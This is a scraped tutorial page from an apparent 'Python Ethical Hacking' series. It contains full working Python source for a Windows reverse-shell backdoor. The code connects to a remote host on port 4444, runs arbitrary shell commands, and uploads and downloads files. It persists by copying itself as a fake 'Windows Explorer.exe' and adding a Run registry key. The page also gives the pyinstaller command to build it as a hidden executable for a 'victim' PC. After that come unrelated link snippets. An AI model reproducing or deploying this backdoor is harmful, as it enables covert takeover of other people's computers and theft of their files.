Polish the Python code by adding the become_persistent function.

#!/usr/bin/env python

import json

import socket

import subprocess

import os

import base64

import sys

import shutil

class Backdoor:

    def __init__(self, ip, port):

        self.become_persistent()

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def become_persistent(self):

        evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"

        if not os.path.exists(evil_file_location):

            shutil.copyfile(sys.executable, evil_file_location)

            subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v test /t REG_SZ /d "' + evil_file_location + '"', shell=True)

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def change_working_directory_to(self, path):

        os.chdir(path)

        return "[+] Changing working directory to " + path

    def execute_system_command(self, command):

        DEVNULL = open(os.devnull, "wb")

        return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Upload successful."

    def run(self):

        while True:

            command = self.reliable_receive()

            try:

                if command[0] == "exit":

                    self.connection.close()

                    sys.exit()

                elif command[0] == "cd" and len(command) > 1:

                    command_result = self.change_working_directory_to(command[1])

                elif command[0] == "upload":

                    command_result = self.write_file(command[1], command[2])

                elif command[0] == "download":

                    command_result = self.read_file(command[1]).decode()

                else:

                    command_result = self.execute_system_command(command).decode()

            except Exception:

                command_result = "[-] Error during command execution."

            self.reliable_send(command_result)

try:

    my_backdoor = Backdoor("10.0.0.43", 4444)

    my_backdoor.run()

except Exception:

    sys.exit()

Convert to Windows executable file.

wine /root/.wine/drive_c/Program\ Files\ \(x86\)/Python37-/Scripts/pyinstaller.exe reverse_backdoor.py --onefile --noconsole

Execute the reverse_backdoor file on the victim Windows 10 PC.

Restarted the victim Windows PC and the communication established automatically.

Python Ethical Hacking - Persistence(2)的更多相关文章

  1. Python Ethical Hacking - Persistence(1)

    PRESISTENCE Persistence programs start when the system starts. Backdoors -> maintain our access. ...

  2. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  3. Python Ethical Hacking - BACKDOORS(1)

    REVERSE_BACKDOOR Access file system. Execute system commands. Download files. Upload files. Persiste ...

  4. Python Ethical Hacking - Malware Analysis(1)

    WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Repo ...

  5. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  6. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

  7. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  8. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  9. Python Ethical Hacking - MAC Address & How to Change(2)

    FUNCTIONS Set of instructions to carry out a task. Can take input, and return a result. Make the cod ...

随机推荐

  1. thinkphp3.2 where 条件查询

    thinkphp3.2 where 条件查询 在连贯操作中条件where的操作有时候自己很晕,所以整理下,有助于使用 查询条件 支持的表达式查询,tp不区分大小写 含义 TP运算符 SQL运算符 例子 ...

  2. ROC曲线 vs Precision-Recall曲线

    深入理解对比两个曲线各自的特性和相互的差异需要花不少时间研读一些国外的技术博客与相关paper,暂时先列出下面这么多,这部分后续可以继续补充. ROC曲线和AUC的定义可以参看“ROC曲线于AUC”, ...

  3. TCP 粘包拆包

    一.什么是粘包拆包? 粘包拆包是TCP协议传输中一种现象概念.TCP是传输层协议,他传输的是“流”式数据,TCP并不知道传输是哪种业务数据,或者说,并不关心.它只是根据缓冲区状况将数据进行包划分,然后 ...

  4. Axis WSDD文件参考文档

    本部分介绍的所有的WSDD元素的名称空间都是"http://xml.apache.org/axis/wsdd/". <deployment> 告诉Axis Engine ...

  5. JavaWeb网上图书商城完整项目--25.注册页面之隐藏没有内容的错误信息实现

    在上一章中我们显示的效果如下所示: 上面后面都有错误的红色×的显示,这样是不对的,我们要解决该问题 我们要循环遍历每一个错误的信息,看它的内容有没有,如果有内容我们就显示错误的×,如果没有就不显示× ...

  6. 小师妹学JVM之:JIT中的PrintCompilation

    目录 简介 PrintCompilation 分析PrintCompilation的结果 总结 简介 上篇文章我们讲到了JIT中的LogCompilation,将编译的日志都收集起来,存到日志文件里面 ...

  7. Day10-微信小程序实战-交友小程序-实现删除好友信息与子父组件间通信

    回顾:上一次已经把消息的布局以及样式做好了 效果图: 在removeList.js文件中,messageId就是发起这个消息的用户了 先查看一下自定义组件的生命周期 https://developer ...

  8. JDK8--08:Optional

    在程序运行时,空指针异常应该是最常见的异常之一,因此JDK8提供了Optional来避免空指针异常. 首先说明JDK8新增的Optional及相关方法的使用 Optional的常用操作: Option ...

  9. ajax前后端交互原理(1)

    1.Node.js简介 1.1.前后台数据交互流程 在web开发中,我们经常听说前端和后台,他们分别是做什么具体工作的呢?他们怎样交互的呢?我们得把这些基础的问题都搞明白了,才有一个大致的学习方向,首 ...

  10. 从零开始实现ASP.NET Core MVC的插件式开发(八) - Razor视图相关问题及解决方案

    标题:从零开始实现ASP.NET Core MVC的插件式开发(八) - Razor视图相关问题及解决方案 作者:Lamond Lu 地址:https://www.cnblogs.com/lwqlun ...